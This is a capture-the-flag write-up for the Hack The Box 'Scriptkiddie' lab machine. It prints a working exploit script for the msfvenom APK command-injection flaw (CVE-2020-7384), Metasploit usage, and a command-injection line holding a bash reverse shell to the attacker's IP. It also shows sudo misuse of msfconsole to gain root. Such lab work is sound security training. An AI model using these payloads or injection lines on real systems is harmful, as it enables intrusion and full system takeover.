Welcome to my write-up for Hack The Box — Scriptkiddie.
I just started to make notes for my machine/box completions for write-up publishing recently and I really started to enjoy doing it. The majority of the completed write-ups are still active machines. Which means I am unfortunately not allowed to upload the write-ups as of yet.
Nmap
sudo nmap -sC -sV -O -A 10.10.10.226 -v
sudo nmap -sC -sV -O -A 10.10.10.226 -v ─╯
Starting Nmap 7.91 ( <https://nmap.org> ) at 2021-04-06 13:13 CEST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 13:13
Completed NSE at 13:13, 0.00s elapsed
Initiating NSE at 13:13
Completed NSE at 13:13, 0.00s elapsed
Initiating NSE at 13:13
Completed NSE at 13:13, 0.00s elapsed
Initiating Ping Scan at 13:13
Scanning 10.10.10.226 [4 ports]
Completed Ping Scan at 13:13, 0.11s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 13:13
Completed Parallel DNS resolution of 1 host. at 13:13, 0.04s elapsed
Initiating SYN Stealth Scan at 13:13
Scanning 10.10.10.226 [1000 ports]
Discovered open port 22/tcp on 10.10.10.226
Discovered open port 5000/tcp on 10.10.10.226
Completed SYN Stealth Scan at 13:13, 0.64s elapsed (1000 total ports)
Initiating Service scan at 13:13
Scanning 2 services on 10.10.10.226
Completed Service scan at 13:13, 6.93s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 10.10.10.226
Retrying OS detection (try #2) against 10.10.10.226
Retrying OS detection (try #3) against 10.10.10.226
Retrying OS detection (try #4) against 10.10.10.226
Retrying OS detection (try #5) against 10.10.10.226
Initiating Traceroute at 13:14
Completed Traceroute at 13:14, 0.04s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 13:14
Completed Parallel DNS resolution of 2 hosts. at 13:14, 0.04s elapsed
NSE: Script scanning 10.10.10.226.
Initiating NSE at 13:14
Completed NSE at 13:14, 1.17s elapsed
Initiating NSE at 13:14
Completed NSE at 13:14, 0.14s elapsed
Initiating NSE at 13:14
Completed NSE at 13:14, 0.00s elapsed
Nmap scan report for 10.10.10.226
Host is up (0.033s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA)
| 256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA)
|_ 256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519)
5000/tcp open http Werkzeug httpd 0.16.1 (Python 3.8.5)
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-title: k1d'5 h4ck3r t00l5
No exact OS matches for host (If you know what OS is running on it, see <https://nmap.org/submit/> ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=4/6%OT=22%CT=1%CU=37488%PV=Y%DS=2%DC=T%G=Y%TM=606C4279
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=107%TI=Z%CI=Z%II=I%TS=A)OPS(
OS:O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11
OS:NW7%O6=M54DST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(
OS:R=Y%DF=Y%T=40%W=FAF0%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=
OS:S)
Uptime guess: 40.043 days (since Thu Feb 25 11:12:32 2021)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 8888/tcp)
HOP RTT ADDRESS
1 33.91 ms 10.10.14.1
2 30.26 ms 10.10.10.226
NSE: Script Post-scanning.
Initiating NSE at 13:14
Completed NSE at 13:14, 0.00s elapsed
Initiating NSE at 13:14
Completed NSE at 13:14, 0.00s elapsed
Initiating NSE at 13:14
Completed NSE at 13:14, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 21.81 seconds
Raw packets sent: 1124 (53.482KB) | Rcvd: 1081 (46.718KB)Looking at the ports we see that orts 22 and 80 are open. Port 22 we can use for SSH so let’s take a note of that. Port 5000 tells us there is something interesting.
http://10.10.10.226:5000/ As you can see below it is a webpage with some hacker features.
Gobuster
sudo gobuster dir -u <http://10.10.10.226> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x phpGobuster gave us nothing.. But a quick google-fu session gave us the following exploit which looks promising!
# Exploit Title: Metasploit Framework 6.0.11 - msfvenom APK template command injection
# Exploit Author: Justin Steven
# Vendor Homepage: <https://www.metasploit.com/>
# Software Link: <https://www.metasploit.com/>
# Version: Metasploit Framework 6.0.11 and Metasploit Pro 4.18.0
# CVE : CVE-2020-7384
#!/usr/bin/env python3
import subprocess
import tempfile
import os
from base64 import b64encode
# Change me
payload = 'echo "Code execution as $(id)" > /tmp/win'
# b64encode to avoid badchars (keytool is picky)
payload_b64 = b64encode(payload.encode()).decode()
dname = f"CN='|echo {payload_b64} | base64 -d | sh #"
print(f"[+] Manufacturing evil apkfile")
print(f"Payload: {payload}")
print(f"-dname: {dname}")
print()
tmpdir = tempfile.mkdtemp()
apk_file = os.path.join(tmpdir, "evil.apk")
empty_file = os.path.join(tmpdir, "empty")
keystore_file = os.path.join(tmpdir, "signing.keystore")
storepass = keypass = "password"
key_alias = "signing.key"
# Touch empty_file
open(empty_file, "w").close()
# Create apk_file
subprocess.check_call(["zip", "-j", apk_file, empty_file])
# Generate signing key with malicious -dname
subprocess.check_call(["keytool", "-genkey", "-keystore", keystore_file, "-alias", key_alias, "-storepass", storepass,
"-keypass", keypass, "-keyalg", "RSA", "-keysize", "2048", "-dname", dname])
# Sign APK using our malicious dname
subprocess.check_call(["jarsigner", "-sigalg", "SHA1withRSA", "-digestalg", "SHA1", "-keystore", keystore_file,
"-storepass", storepass, "-keypass", keypass, apk_file, key_alias])
print()
print(f"[+] Done! apkfile is at {apk_file}")
print(f"Do: msfvenom -x {apk_file} -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -o /dev/null")Metasploit
Let us try a Metasploit exploit, we are looking for APK upload.
msfconsole ─╯
.~+P``````-o+:. -o+:.
.+oooyysyyssyyssyddh++os-````` ``````````````` `
+++++++++++++++++++++++sydhyoyso/:.````...`...-///::+ohhyosyyosyy/+om++:ooo///o
++++///////~~~~///////++++++++++++++++ooyysoyysosso+++++++++++++++++++///oossosy
--.` .-.-...-////+++++++++++++++////////~~//////++++++++++++///
`...............` `...-/////...`
.::::::::::-. .::::::-
.hmMMMMMMMMMMNddds\\...//M\\\\.../hddddmMMMMMMNo
:Nm-/NMMMMMMMMMMMMM$$NMMMMm&&MMMMMMMMMMMMMMy
.sm/`-yMMMMMMMMMMMM$$MMMMMN&&MMMMMMMMMMMMMh`
-Nd` :MMMMMMMMMMM$$MMMMMN&&MMMMMMMMMMMMh`
-Nh` .yMMMMMMMMMM$$MMMMMN&&MMMMMMMMMMMm/
`oo/``-hd: `` .sNd :MMMMMMMMMM$$MMMMMN&&MMMMMMMMMMm/
.yNmMMh//+syysso-`````` -mh` :MMMMMMMMMM$$MMMMMN&&MMMMMMMMMMd
.shMMMMN//dmNMMMMMMMMMMMMs` `:```-o++++oooo+:/ooooo+:+o+++oooo++/
`///omh//dMMMMMMMMMMMMMMMN/:::::/+ooso--/ydh//+s+/ossssso:--syN///os:
/MMMMMMMMMMMMMMMMMMd. `/++-.-yy/...osydh/-+oo:-`o//...oyodh+
-hMMmssddd+:dMMmNMMh. `.-=mmk.//^^^\\\\.^^`:++:^^o://^^^\\\\`::
.sMMmo. -dMd--:mN/` ||--X--|| ||--X--||
........../yddy/:...+hmo-...hdd:............\\\\=v=//............\\\\=v=//.........
================================================================================
=====================+--------------------------------+=========================
=====================| Session one died of dysentery. |=========================
=====================+--------------------------------+=========================
================================================================================
Press ENTER to size up the situation
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Date: April 25, 1848 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%% Weather: It's always cool in the lab %%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%% Health: Overweight %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%% Caffeine: 12975 mg %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%% Hacked: All the things %%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Press SPACE BAR to continue
=[ metasploit v6.0.37-dev ]
+ -- --=[ 2115 exploits - 1136 auxiliary - 357 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 8 evasion ]
Metasploit tip: Save the current environment with the
save command, future console restarts will use this
environment again
msf6 > search apk
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/android/google_play_store_uxss_xframe_rce normal No Android Browser RCE Through Google Play Store XFO
1 exploit/android/local/janus 2017-07-31 manual Yes Android Janus APK Signature bypass
2 auxiliary/dos/dns/bind_tsig_badtime 2020-05-19 normal No BIND TSIG Badtime Query Denial of Service
3 exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection 2020-10-29 excellent No Rapid7 Metasploit Framework msfvenom APK Template Command Injection
4 exploit/android/browser/samsung_knox_smdm_url 2014-11-12 excellent No Samsung Galaxy KNOX Android Browser RCE
5 exploit/windows/fileformat/vlc_realtext 2008-11-05 good No VLC Media Player RealText Subtitle Overflow
6 exploit/windows/browser/webex_ucf_newobject 2008-08-06 good No WebEx UCF atucfobj.dll ActiveX NewObject Method Buffer Overflow
Interact with a module by name or index. For example info 6, use 6 or use exploit/windows/browser/webex_ucf_newobject
msf6 > use 3
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > options
Module options (exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection):
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME msf.apk yes The APK file name
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.178.117 yes The listen address (an interface may be specifie
d)
LPORT 4444 yes The listen port
**DisablePayloadHandler: True (no handler will be created!)**
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > set lhost tun0
lhost => tun0
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > run
[+] msf.apk stored at /home/user/.msf4/local/msf.apk
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_templmsf6 exploit(unix/fileformat/metasploit_msfvenom_apk_templinjection) >Next, set up a listener.
nc -lvnp 4444 ─╯
listening on [any] 4444 ...Upload to the target site:
And we have a shell!
nc -lvnp 4444 ─╯
listening on [any] 4444 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.226] 50734
whoami
kidFrom here we can grab the user flag!
/kid
ls
html
logs
snap
user.txtNext up, getting root! Going in to the home directory we see 2 users:
recon
scanlosers.shI tried to run the scanlosers.sh but it didn’t work, so I cat the file to see its code:
#!/bin/bash
log=/home/kid/logs/hackers
cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done
if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fiIt seems that if something triggers this script it will be needing a file or script from /home/kid/logs/hackers. The hackers file seems to be empty or is unviewable to me, but that is not stopping me from writing to it. Let’s make a reverse shell script and put that in there. But before we do that, let’s get a listener running.
nc -nlvp 1337I’ve put in the following command next to overwrite the “hackers” file.
echo " ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.15/1337 0>&1' #" >> hackersAnd our listener fires!
nc -lvnp 1337 ─╯
listening on [any] 1337 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.226] 55350
bash: cannot set terminal process group (876): Inappropriate ioctl for device
bash: no job control in this shell
pwn@scriptkiddie:~$ id
id
uid=1001(pwn) gid=1001(pwn) groups=1001(pwn)What are our priviledges as pwn?
pwn@scriptkiddie:~$ sudo -l
sudo -l
Matching Defaults entries for pwn on scriptkiddie:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin
User pwn may run the following commands on scriptkiddie:
(root) NOPASSWD: /opt/metasploit-framework-6.0.9/msfconsoleWe can sudo msfconsole! This will be easy!
pwn@scriptkiddie:~$ sudo msfconsole
sudo msfconsole
######## #
################# #
###################### #
######################### #
############################
##############################
###############################
###############################
##############################
# ######## #
## ### #### ##
### ###
#### ###
#### ########## ####
####################### ####
#################### ####
################## ####
############ ##
######## ###
######### #####
############ ######
######## #########
##### ########
### #########
###### ############
#######################
# # ### # # ##
########################
## ## ## ##
<https://metasploit.com>
=[ metasploit v6.0.9-dev ]
+ -- --=[ 2069 exploits - 1122 auxiliary - 352 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
Metasploit tip: Use help <command> to learn more about any command
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
msf6 > cd /root
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
msf6 > ls
stty: 'standard input': Inappropriate ioctl for device
[*] exec: ls
root.txt
snap
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
msf6 > cat root.txt
stty: 'standard input': Inappropriate ioctl for device
[*] exec: cat root.txt
axxxxxxxxxxxxxxxxxxxxxxxxxxxxxx4
